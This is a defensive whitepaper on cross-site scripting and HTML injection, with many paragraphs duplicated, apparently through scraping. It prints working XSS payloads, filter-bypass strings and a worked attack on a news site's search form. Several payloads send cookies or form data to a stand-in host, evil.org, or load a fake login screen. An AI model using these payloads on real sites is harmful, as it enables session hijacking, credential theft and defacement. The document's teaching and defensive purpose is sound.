Introduction
Web servers delivering dynamic
content to Internet clients constitute an integral component of most
organisations online service offerings. The ability to tune content and
respond to an individual client request represents standard
functionality for any successful site. Unfortunately, due to poorly
developed application code and data processing systems, the majority of
these successful sites are vulnerable to attacks that focus upon the way
HTML content is generated and interpreted by client browsers. Attackers
are often able to embed malicious HTML-based content within client web
requests. With sufficient forethought and analysis, attackers can
exploit these flaws by embedding scripting elements within the returned
content without the knowledge of the sites visitor.
Although the potential dangers have been known for several years now, the recent successes and improved understanding of cross-site scripting attacks has increased the importance of correctly handing user input within dynamically generated web content. High profile sites have already been shown to be susceptible to cross-site scripting attack. Future attacks are likely to become more sophisticated and, through automation and exploitation of client browser vulnerabilities, many times more devastating.
This document aims to educate those responsible for the management and development of commercial online services by providing the information necessary to understand the significance of the threat, and provide advice on securing applications against this type of attack.
Although the potential dangers have been known for several years now, the recent successes and improved understanding of cross-site scripting attacks has increased the importance of correctly handing user input within dynamically generated web content. High profile sites have already been shown to be susceptible to cross-site scripting attack. Future attacks are likely to become more sophisticated and, through automation and exploitation of client browser vulnerabilities, many times more devastating.
This document aims to educate those responsible for the management and development of commercial online services by providing the information necessary to understand the significance of the threat, and provide advice on securing applications against this type of attack.
Code Insertion
The success of this type of
attack hinges upon the functionality of the client browser. In HTML, to
distinguish displayable text from the interpreted markup language, some
characters are treated specially. One of the most common special
characters used to define elements within the markup language is the
“<“ character, and is typically used to indicate the beginning of an
HTML tag. These tags can either affect the formatting of the page or
induce a program that the client browser executes (e.g. the
<SCRIPT> tag introduces a JavaScript program).
As most web browsers have the ability to interpret scripts embedded within HTML content enabled by default, should an attacker successfully inject script content, it will likely be executed within context of the delivery (e.g. website, HTML help, etc.) by the end user. Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.
While this document largely focuses upon the threat presented through the injection of malicious scripting code, other tags may be inserted and abused by an attacker. Consider the <FORM> tag – by inserting the appropriate HTML tag information, an attacker could trick visitors to the site into revealing sensitive information by modifying the behaviour of the existing form for instance. Other HTML tags may be inserted to alter the appearance and behaviour of a page (e.g. alteration of an organisations online annual accounts or presidents statement?).
It is important to understand the HTML tags that are most commonly used to carry out code insertion tags. The following table details the most important attributes of these tags. However, it is important to note that alternative “in-line” scripting elements may be used and interpreted by the current generation of web browsers, such as javascript:alert('executing script').
As most web browsers have the ability to interpret scripts embedded within HTML content enabled by default, should an attacker successfully inject script content, it will likely be executed within context of the delivery (e.g. website, HTML help, etc.) by the end user. Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.
While this document largely focuses upon the threat presented through the injection of malicious scripting code, other tags may be inserted and abused by an attacker. Consider the <FORM> tag – by inserting the appropriate HTML tag information, an attacker could trick visitors to the site into revealing sensitive information by modifying the behaviour of the existing form for instance. Other HTML tags may be inserted to alter the appearance and behaviour of a page (e.g. alteration of an organisations online annual accounts or presidents statement?).
It is important to understand the HTML tags that are most commonly used to carry out code insertion tags. The following table details the most important attributes of these tags. However, it is important to note that alternative “in-line” scripting elements may be used and interpreted by the current generation of web browsers, such as javascript:alert('executing script').
HTML Tag | Description |
<SCRIPT> | Adds a script that is to be used in the document. Attributes:
|
<OBJECT> | Places an
object (such as an applet, media file, etc.) on a document. The tag
often contains information for retrieving ActiveX controls that IE uses
to display the object. Attributes:
|
<APPLET> | Used to place a Java applet on a document. It is depreciated in the HTML 4.0 specification in favour of <object> tag. Attributes:
|
<EMBED> | Embeds an
object into the document. Embedded objects are most often multimedia
files that require special plug-ins to display. Specific media types and
their respective plug-ins may have additional proprietary attributes
for controlling the playback of the file. The closing tag is not always
required, but is recommended. The tag was dropped by the HTML 4.0
specification in favour of the <object> tag. Attributes:
|
<FORM> | Indicates the beginning and end of a form. Attributes:
|
Malicious Code
An embedded code attack is
heavily dependant upon the delivery mechanism. Thus the delivery method
often dictates the audience the script will potentially affect.
It is interesting to note that such attacks have been around since before the Internet and HTML. Back in the days of dial-up Bulletin Boards Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII and later, the use of vector drawing languages permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt along time ago to rigorously control the content that be could submitted.
An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took the user submitted text from a standard POST form. This data was then added to the discussion page, without any further processing. Users often included text formatting tags to bold, italicise or colour their text – making a greater visual impact to their message. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, resulting in the unintentional effect of altering every following message on the page. Now consider the implications of a user embedding the following two code snippets in their posting and what the implications would be to everyone viewing the message.
Hello World! <SCRIPT>malicious code</SCRIPT> It is interesting to note that such attacks have been around since before the Internet and HTML. Back in the days of dial-up Bulletin Boards Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII and later, the use of vector drawing languages permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt along time ago to rigorously control the content that be could submitted.
An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took the user submitted text from a standard POST form. This data was then added to the discussion page, without any further processing. Users often included text formatting tags to bold, italicise or colour their text – making a greater visual impact to their message. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, resulting in the unintentional effect of altering every following message on the page. Now consider the implications of a user embedding the following two code snippets in their posting and what the implications would be to everyone viewing the message.
Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">
Unfortunately, attackers are
finding ever more ingenious methods of encoding their embedded attacks,
and consequently many more sites are vulnerable.
Of particular importance is the abuse of trust. Consider a trusted site with a poorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site sends a page back to the browser including the value of criteria, which consequently forces the execution of code from the evil attackers’ server. For example;
<A
HREF="http://trusted.org/search.cgi?criteria=<SCRIPT
SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to
trusted.org</A> Of particular importance is the abuse of trust. Consider a trusted site with a poorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site sends a page back to the browser including the value of criteria, which consequently forces the execution of code from the evil attackers’ server. For example;
In the attack above, one source is inserting code into pages sent by another source.
It should be noted that this attack:
• disguises the link as a link to http://trusted.org,
• can be easily included in an HTML email message,
• does not supply the malicious code inline, but is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at anytime.
This class of vulnerability is popularly referred to as cross-site scripting (CSS or sometimes XSS).
Cross Site Scripting
A cross-site scripting
vulnerability is caused by the failure of an web based application to
validate user supplied input before returning it to the client system.
“Cross-Site” refers to the security restrictions that the client browser
usually places on data (i.e. cookies, dynamic content attributes, etc.)
associated with a web site. By causing the victim’s browser to execute
injected code under the same permissions as the web application domain,
an attacker can bypass the traditional Document Object Model (DOM)
security restrictions which can result not only in cookie theft but
account hijacking, changing of web application account settings,
spreading of a webmail worm, etc.
Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox.
The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn’t necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.
The most popular CSS/XSS attack (and devastating) is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victims active session, completely bypassing the authentication process. Unfortunately, the mechanism of the attack is very simple and can be easily automated. A detailed paper by iDefence goes into great detail explaining the process, but can be quickly summarised as follows:
Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox.
The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn’t necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.
The most popular CSS/XSS attack (and devastating) is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victims active session, completely bypassing the authentication process. Unfortunately, the mechanism of the attack is very simple and can be easily automated. A detailed paper by iDefence goes into great detail explaining the process, but can be quickly summarised as follows:
- The attacker investigates an interesting site that normal users must authenticate to gain access to, and that tracks the authenticated user through the use of cookies or session ID’s
- The attacker finds a CSS vulnerable page on the site, for instance http://trusted.org/ account.asp.
- Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims.
- Embedded within the special link are some coding elements specially designed to transmit a copy of the victims cookie back to the attacker. For instance: <img src="http://trusted.org/account.asp?ak=<script>document.location .replace('http://evil.org/steal.cgi?'+document.cookie);</script>">
- Unknown to the victim, the attacker has now received a copy of their cookie information.
Note that Cross-site scripting is commonly referred to as CSS and/or XSS.
Understanding Code Insertion
To date, security professions have discovered an ever increasing number of methods for potentially embedding code within poorly configured web applications. The following are some of the more common methods for doing so.Inline Scripting
http://trusted.org/search.cgi?criteria=<script>code</script>http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'> </SCRIPT>
http://trusted.org/COM2.IMG%20src= "Javascript:alert(document.domain)"
Forced Error Responses
http://trusted.org/<script>code</script>This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data.
http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>
If a Java application such as a servlet fails to handle an error gracefully, and allows stack traces to be sent to the users browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of the request.
http://trusted.og/servlet/ org.apache.catalina.servlets.WebdavStatus/<script>code</script>
In the example above, when the Tomcat servlet is called with the training illegitimate request, an error page is served containing the offending text verbatim.
Non <SCRIPT> Events
" [event]='code'In many cases it may be possible for an attacker to insert an exploit string, with the above syntax, into a HTML tag that should have been like:
<A HREF="exploit string">Go</A>
resulting in:
<A HREF="" [event]='code'">Go</A>
<b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>
As the client cursor moves over the bolded text, an intrinsic event occurs and the JavaScript code is executed.
JavaScript Entities
<img src="&{alert('CSS Vulnerable')};">The special character “&” is sometimes interpreted as a new JavaScript code segment (entity).
Typical Payloads Formatting
<img src = "malicious.js"><script>alert('hacked')</script>
<iframe = "malicious.js">
<script>document.write('<img src="http://evil.org/'+document.cookie+'") </script>
<a href="javascript:…">click-me</a>
Insertion Example |
Dynamic URL Generation
Consider
an application built for running on Microsoft’s Internet Information
Server (IIS) web server platform. Dynamic content is delivered through
IIS’s Active Server Pages (ASP).
<% Within the sample page, a dynamically built HTML tag for refining search parameters is constructed as follows: <A HREF="http://trusted.org/search_main.asp? searchstring=SomeString">click-me</A> and the ASP code required to generate a further query based upon this submitted information is: var BaserUrl = "http://trusted.org/search2.asp? searchagain=";Response.Write("<a href=\"" + BaseUrl + Request.QueryString("SearchString") + "\">click-me</a>" ) %> If the attacker was to replace the “SomeString” with their own code, as indicated next: <a href="http://trusted.org/search_main.asp? SearchString=%22+onmouoseover%3D%27ClientForm% 2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData% 3D%22+%2B+ClientForm%2EPersonalData%3BClientForm% 2Esubmit%3B%27">FooBar</a> The likely result found in the dynamically generated ASP page will be: <A HREF="http://trusted.org/search2.asp? searchagain="" onmouoseover='ClientForm. action="evil.org/get.asp?Data=" + ClientForm.PersonalData;ClientForm. submit;'">click-me</A> In this case, the attacker has added to the HTML page code, and used the DOM of the HTML page to redirect data in some form to the attacker’s web site. |
Bypassing Anti-CSS Filters
A key function of any
application filtering process will be the removal of possible dangerous
special characters. However, in many circumstances it may be difficult
to filter a large range of these characters due to the applications
unique requirements.
Corporate application developers must carefully evaluate how their code will perform with a variety of attack strings. In addition, they should fully understand the different methods that special characters can be encoded.
One of the most popular alternative character representations is HTML escaped encoding, sometimes mistakenly referred to as Unicode encoding. In this system, the HEX value of the ASCII character is prefixed with the “%” character.
Corporate application developers must carefully evaluate how their code will perform with a variety of attack strings. In addition, they should fully understand the different methods that special characters can be encoded.
One of the most popular alternative character representations is HTML escaped encoding, sometimes mistakenly referred to as Unicode encoding. In this system, the HEX value of the ASCII character is prefixed with the “%” character.
Char | ; | / | ? | : | @ | = | & | < | > | “ | # |
Code | %3b | %2f | %3f | %3a | %40 | %3d | %26 | %3c | %3e | %22 | %23 |
Char | { | } | | | \ | ^ | ~ | [ | ] | ` | % | ‘ |
Code | %7b | %7d | %7c | %5c | %5e | %7e | %5b | %5d | %60 | %25 | %27 |
Inserting Malicious Code |
Simple Filtering of “<“ and “>“ Many applications that implement some kind of content filtering will typically filter out the “<“ and “>“ characters at the client-side. At first glance, this looks like an effective way of ensuring <script> type HTML tags are not possible. Unfortunately, not only client-side code easy to bypass, in many circumstances it can be bypassed using a mix of alternative character representations and other special characters. Consider a routine that removes the “<“ and “>“ special characters: document.write(cleanSearchString('<>')); The attacker now uses an alternative coding for the filtered characters, “\x3c” and “\x3e” respectively, and initialises their code with “’) +” to escape out of the routine. ') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e' Commenting out malicious code Consider an application that filters content on behalf of it clients by causing any scripting content to be “safely” commented out. For instance, <script>code</script> is filtered by the application to become: <COMMENT> <!-- code (NOT PARSED BY FILTER) //--> </COMMENT> Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that will close the <comment> filter process. For example, the attacker can send the following code: <script> - --> </COMMENT> <img src="http://none" onerror="alert(document.cookie);window.open( http://evil.org/fakeloginscreen.jsp); "> </script> After processing by the filter, the following code is embedded in the returned document: <COMMENT> <!-- - --> </COMMENT> <img src="http://none" onerror="alert(document.cookie);window.open(http://evil.org/ fakeloginscreen.jsp);"> </COMMENT>
This
particular attack was originally designed to bypass the security
filtering processes of a large web-mail provider, and would have been
embedded in HTML email content. Users viewing the email would
automatically be prompted with a fake login screen, making for an easy
method of harvesting user names and passwords.
Separate Window Handling A popular method of handling potentially dangerous URL information is to force the URL to be opened in a new browser window. This then causes and malicious code to be executed in the context of a different DOM, using the ‘target=“_blank”’ addition to the HTML <HREF> tag. Unfortunately, in many online email applications it is possible to bypass after analysing the “harmless” link supplied by the site. Consider a site that parses the content, <a href="javascript:…">click-me</a> and, after processing, becomes: <a href="javascript:…" target="_blank">click-me</a> Causing the URL to be opened in a new window. However, if the attacker constructs his HREF as follows, <a href="javascript:..." foo="bar>click-me</a> it will be interpreted as: <a href="javascript:..." foo="bar target="_blank">click-me</a> causing the code to be executed in the same page, under the same DOM. Escaped JavaScript Entities In cases where almost all special characters have are filtered from user supplied strings, attackers must encode the entire attack string. Consider the following URL: http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL %27%29%7d%3b&apropos=pos2 The “%26%7balert%28%27EVIL%27%29%7d%3b” resolves to &{alert('EVIL')}; causing in this instance an unexpected JavaScript alert window to popup, with the text “EVIL”. |
Web Integration
As client web browsers have
evolved, they have incorporated an increasingly diverse range of
functions. At the same time, many common desktop applications have
extended their functionality to replicate or incorporate the
functionality of these same browsers. While the security flaw may be
HTML injection, and more specifically CSS, the avenues available for a
malicious user or attacker to initiate the attack are becoming ever
broader. As is already evident, a popular “personalised” delivery
mechanism has now become HTML email. Unfortunately, the delivery methods
are becoming so diverse that no “single” security solution is available
to prevent the attack. Consider the significance of the following
delivery mechanisms.
The Flash! Attack
Flash! is a popular application
for displaying animated visual information. Is has it’s own development
language (ActiveScript) for creating sophisticated interactive menus,
animated movies and games. The most popular web browsers often install
the interpreter for these files by default and, due to the large number
of sites that use the technology; many people will install the
interpreter even if it wasn’t originally available with their web
browser.
ActiveScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between the Flash! interpreter and the web browser, it is possible to insert scripting code that would be successfully interpreted by the client web browser.
For instance, instead of: ActiveScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between the Flash! interpreter and the web browser, it is possible to insert scripting code that would be successfully interpreted by the client web browser.
getURL("http://www.technicalinfo.net")
It is possible to specify scripting code:
getURL("javascript:alert(document.cookie)")
Thus, it is possible to embed potentially dangerous scripting elements within a common file format. The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filter out HTML <script> type tags) and local security web browser settings.
For an attack to be successful, the dangerous Flash! file (typically terminating in a “.swf” extension) must be embedded within HTML data for viewing by remote clients. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for instance:
<EMBED
src="http://evil.org/badflash.swf" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?
P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"
width="100"
height="100">
</EMBED>
The Impact
The impact of malicious code
insertion is often difficult to quantify and will change as new
functionality or interactions are incorporated into both web servers and
client browsers. Already, users may unintentionally execute scripts
written by an attacker when they follow untrusted links in web pages,
mail or instant messages, or any other application capable of displaying
HTML content (e.g. Microsoft Help). For this reason, a series of
examples best illustrate the diversity and impact of potential threats.
Consider the following examples: -
An attacker often has access to the document retrieved since the malicious scripts are executed in a context that appears to have originated from the trusted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacker.
-
An attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server.
-
An attacker may be able to poison the sites persistent cookies, thus modifying the cookie content and causing malicious code to be executed each time the user visits the trusted site. The malicious code is stored as a field variable within the cookie, and executed each time the site dynamically generates page content without the correct processing.
-
An attacker may be able to cause a “hidden window” to start on the client machine and us this to key-log all browser interaction of the victim. Should the victim later visit sites requiring authentication, the attacker could harvest this information.
-
CSS type attacks can occur over SSL-encrypted connections. The victim, accessing a trusted host over HTTPS, may still execute an attackers code unintentionally. If the attacker references document components on a remote host, the victims client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on a SSL-capable web server.
-
An attacker may construct the malicious code to reference internal resources. Thus, an attacker may gain unauthorised access to an Intranet web server. Only one page on one web server in a domain is required to compromise the entire domain.
-
An attacker may be able to bypass policies that prevent the victim browser from executing scripts. For example, Internet Explorer security “zones” may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed their code within the content of a trusted internal host.
-
An attacker may use a social engineering aspect to the attack. Consider an application that requires clients to complete a form to set up their account. An attacker may be able to insert malicious code into their application data. A quick phone call to the corporate help-desk asking for advice on their account may cause the execution of the malicious code on the help-desk system.
-
Even if the victims’ web browser does not support scripting, an attacker may still be able to alter the content of the page – affecting its appearance, behaviour or normal operation.
- Return results based upon user input to search engines,
- Process credit card information,
- Store and user supplied content in databases and cookies for later retrieval.
Vulnerability Checking
Finding out if your application is vulnerable to a code insertion attack is often very simple. The key lies in the analysis of the dynamically generated client-side HTML content. The following process has been frequently used in the past.- For each visible input field (these may be
located in an HTML form, or represented in the URL as “variable=“), try
the most obvious scripting formats:
<script>alert('CSS Vulnerable')</script>
<img csstest=javascript:alert('CSS Vulnerable')>
&{alert('CSS Vulnerable')};
In any case, should an alert message popup with the text “CSS Vulnerable”, the application component is vulnerable - specifically the input field just checked. - If, either of the above scripting checks cause the HTML page to display incorrectly, the application component may still be vulnerable.
- For each visible variable, submit/substitute the following string:
'';!--"<CSS_Check>=&{()} (Note that the string begins with two single-quotes)
On the resultant page, search for the string “<CSS_Check>“. If you discover “<CS_Check>“, it is quite probable that the application component is vulnerable. However, if the word CSS_Check is no longer enclosed in something similar to %ltCSS_Check%gt, then it may not be vulnerable. If input is displayed literally at ANY point in the document, it can be used to divert the flow of execution to an attacker-supplied payload. - Having located the word CSS_Check, verify what (if any) other characters have be altered or filtered from the original string “'';!--"<CSS_Check>= &{()}”. Depending upon the filtered characters, the application component may still be vulnerable.
- Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If these characters exist, unfiltered, in responses to the test string of part 3 (above) – then there is a high probability that the application component is vulnerable.
- Moving on from the obvious fields, repeat the process for all the hidden fields not normally editable at the client end. The best method of doing this is through the use of a free local host proxy server such as Achilles by DigiZen Security group and WebProxy by @stake. The proxy servers allow the editing of HTTP requests as they leave the client application, before being finally sent to the server application.
- In many cases, data will be submitted via the HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components that require the HTTP POST command to submit data.
Putting It All Together
To bring together many of the
ideas and processes discussed earlier in this document, an example can
be used to bring it all together. In this example, the anonymous site
has a search engine that responds to client data submissions. Normally
the site would look like this:
Taking a closer look at the
content source, we notice that our sample code appears 21 times in the
document, in various formats.
It appears 10 times in a format similar to: <SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/
anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')
</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT>
9 times in a format similar to:
<a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript
%3E&pager.offset=10">2</a>
And twice in the format similar to:
document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\
"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>');
Obviously there are three different server-side processing routines for processing client search data.
- In the first type (ad.uk.doubleclick.net format), it appears that the processing routine changes the case of characters and changes white space to the underscore (“_”).
- The second type (href=) converts special characters into their escape-encoded formats, and white space into the “+” character.
- The third type (document.writeln) places the complete string within a document.writeln JavaScript routine.
Several opportunities present
themselves here. To make the site execute the JavaScript alert box for
each type, we need to force the <script> tags outside of any other
HTML tags. Thus, for each type, the following methods will work:
- ><script>alert('CSS Vulnerable')</script><b a=a
- a></a><script>alert('CSS Vulnerable')</script>
- \'><script>alert%28\'CSS Vulnerable\'%29</script><
However, for this example, we
shall focus on the last type (document.writeln). Since it is possible to
inject code into the returned HTML page to the anonymous News site, to
make the attack interesting, we shall “write” our own fake news article.
Due to the maximum length of any
string we can send to the site, and the likely length of the fake news
article, we shall create a JavaScript include file (.js) which we will
load in to the page using: \'><script%20src%3dhttp://evil.org/faked.js></script>
In this example, the include file will use
multiple document.write statements to create the fake news article.
There are several key features to the include file, and include - - Use of HTML <DIV> tags to position the content on the page. Doing so allows the attacker to cover over existing content as they wish.
- Using a table to keep all the article text together.
- Rewriting of the URL source field at the top of the browser.
- Rewriting of the browser status bar.
var d = document;
d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2">
<TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');
d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');
So far, everything we have
tested on the site makes use of the existing form to submit the
attacker’s code. This submission is done by a HTTP POST command, such
as:
POST /Search HTTP/1.0
Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com
Content-Length: 135
Pragma: no-cache
dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js>
</script>newSearch=true&pro=IT&searchOption=articles
POST /Search HTTP/1.0
Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com
Content-Length: 135
Pragma: no-cache
dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js>
</script>newSearch=true&pro=IT&searchOption=articles
It is a simple process to
convert the HTTP POST into a single URL. Unfortunately for the anonymous
news site, the web application does not differentiate the methods of
receiving data. Thus the following attack URL allows the attacker to
place his own content “on” the site.
http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script
%20src%3dhttp://evil.org/faked.js></script>newSearch=true&pro=IT
&searchOption=articles
http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script
%20src%3dhttp://evil.org/faked.js></script>newSearch=true&pro=IT
&searchOption=articles
Defending Against the Attack
Solutions for Users
The only clear-cut solution for
the user is to disable all scripting languages on their computer.
Unfortunately, it is highly likely that much functionality of the sites
regularly visited will be removed. Thus users should only pursue this
option if they require the lowest possible level of request.
Alternatively, users must be selective as to the sites they trust, and
the sources of URL links. Again, the disabling of scripting languages
will not prevent attackers influencing the appearance of content
provided by trusted sites by embedding other HTML tags in the URL link.
With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker’s web site may still use scripted code to alter the representation of the links in the client browser.
Unfortunately many integrated applications increase the threat of scripting code being executed on the users system, particularly through the use of embedded objects such as Flash! .swf files. To prevent these types of attacks, users must either uninstall the interpreters or ensure protection systems are capable of stopping the execution of such content. It is envisaged that popular anti-virus and personal intrusion detection systems will eventually be capable of this.
Frankly, the onus for protecting users against code insertion and CSS type attacks relies upon the development of secure server-side applications. Ideally, the application should correctly handle and comment submitted data. Unfortunately, the likelihood that the application developer will miss some subtle character representation is quite high.
With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker’s web site may still use scripted code to alter the representation of the links in the client browser.
Unfortunately many integrated applications increase the threat of scripting code being executed on the users system, particularly through the use of embedded objects such as Flash! .swf files. To prevent these types of attacks, users must either uninstall the interpreters or ensure protection systems are capable of stopping the execution of such content. It is envisaged that popular anti-virus and personal intrusion detection systems will eventually be capable of this.
Frankly, the onus for protecting users against code insertion and CSS type attacks relies upon the development of secure server-side applications. Ideally, the application should correctly handle and comment submitted data. Unfortunately, the likelihood that the application developer will miss some subtle character representation is quite high.
Solutions for Developers and Organisations
As no two applications are ever
the same, application developers will need to tune their security
countermeasures as defined by business requirements. The key to
preventing applications being vulnerable to code injection and CSS type
attacks is by ensuring that dynamically generated page content does not
contain undesired HTML tags.
The most likely sources of malicious data are likely to be: - Query strings
- URL’s and pieces of UL’s
- Posted data
- Cookies
- Persistent data supplied by users, and retrieved at a later date (such as from databases)
The following methods or design
considerations can be implemented by developers to better secure their
application against HTTP based attacks, not just CSS.
Limit Server Responses
In many cases it may be possible
to limit the amount of “personalised” data that will be returned to
client browsers through the use of generic responses.
For example, consider a site that that displays the greeting “Hello, Gunter!” in response to http://trusted.org/greeting.jsp?name=Gunter. It would be a preferable security option to sacrifice this dynamic response with a hard-coded response such as “Hello, User!”
For example, consider a site that that displays the greeting “Hello, Gunter!” in response to http://trusted.org/greeting.jsp?name=Gunter. It would be a preferable security option to sacrifice this dynamic response with a hard-coded response such as “Hello, User!”
Enforce Response Lengths
For the majority of
applications, the developer should be able to limit the maximum length
of any user-supplied strings. Although initially enforced at the
client-side, all strings should also be checked at the server-side.
Where possible, enforce the limitation of the maximum necessary string
length by truncating any longer responses.
HTTP Referer
As part of the HTTP standard,
provision is made for a field header called “referer”. When a client
browser follows a link or submits form data, the referer field should
contain the URL of the page that the link or data came from. If
possible, the web application should check the referer field and reject
data if it didn’t come from the correct host or link.
HTTP Referer | |
Usually appearing in the HEAD of any HTTP requests: Referer: http://www.anonymous.com/Search Accept-Language: en-gb Content-Type: application/x-www-form-urlencoded Host: www.anonymous.com |
|
Advantages:
|
Disadvantages:
|
Embedded Files and Objects
As witnessed by the Flash!
Attack, attackers may be capable of embedding scripting components that
can be interpreted by the client web browser and used to conduct a CSS
attack.
For inclusion within a HTML based document, embedded files and objects are referred to using the HTML <EMBED> and <OBJECT> tags. Several options are available for decreasing the threat of embedded CSS attacks:
For inclusion within a HTML based document, embedded files and objects are referred to using the HTML <EMBED> and <OBJECT> tags. Several options are available for decreasing the threat of embedded CSS attacks:
-
The safest option is to treat <EMBED> and <OBJECT> tags the same as <SCRIPT> tags, and disallow any content to be submitted to the application that contains such data strings.
-
Depending upon the format of the embedded object, it may be possible parse filter content based upon content within the object. For instance, with Flash! files, it would be possible to remove all instances where the getURL() field contains a reference to a site other than the current application host. Alternatively, it may be possible to specify the target window as “_blank” and thus stopping any potential scripting code from being executed under the hosting domains privileges.
HTTP POST not GET
In the majority of cases, remote
code insertion attacks are likely to be through the submission of user
data in HTML forms. One prevention step is to ensure that form
submission is only ever done through HTTP POST requests. Allowing HTTP
GET request submissions will allow potentially attackers to craft
distributable URL’s containing the offending code.
When coding the server-side application, it is extremely important to ensure that the client-side data can only be received through HTTP POST variables. Most web hosting applications will indicate the variable delivery method.
When coding the server-side application, it is extremely important to ensure that the client-side data can only be received through HTTP POST variables. Most web hosting applications will indicate the variable delivery method.
HTTP POST not GET | |
Forcing the use of HTTP POST over GET is a simple process and easy to implement. | |
Advantages:
|
Disadvantages:
|
Cookie Inspection
Many applications utilise
cookies for managing the state of the communication, and local storage
of information relevant to the user. Application developers must ensure
that all cookie information is thoroughly checked and filtered before
insertion into the HTML documents. Attackers modifying persistent
cookies can also make their attacks persistent.
URL Session Identifier
In some circumstances, the use
of a unique session identifier for each valid user can be used to
prevent remote exploitation of URL based code insertion attacks.
As a user arrives at the web site, they are automatically allocated a unique session ID. This session ID can ONLY be obtained from one page on the site (usually the start/home page). Should a visitor try to access any other page within the site without a valid session ID, they are automatically redirected to the start page and issued one.
Should an attacker discover a CSS flaw with one application component, any crafted exploit URL will have to contain a valid session ID. By rigorously controlling the session ID timeout, the attacker will not be able make use of the flaw (other than affecting the attacker locally) outside of this period.
For additional security, the session ID could also be made in include a hashed version (or checksum) of the client browser’s IP address.
As a user arrives at the web site, they are automatically allocated a unique session ID. This session ID can ONLY be obtained from one page on the site (usually the start/home page). Should a visitor try to access any other page within the site without a valid session ID, they are automatically redirected to the start page and issued one.
Should an attacker discover a CSS flaw with one application component, any crafted exploit URL will have to contain a valid session ID. By rigorously controlling the session ID timeout, the attacker will not be able make use of the flaw (other than affecting the attacker locally) outside of this period.
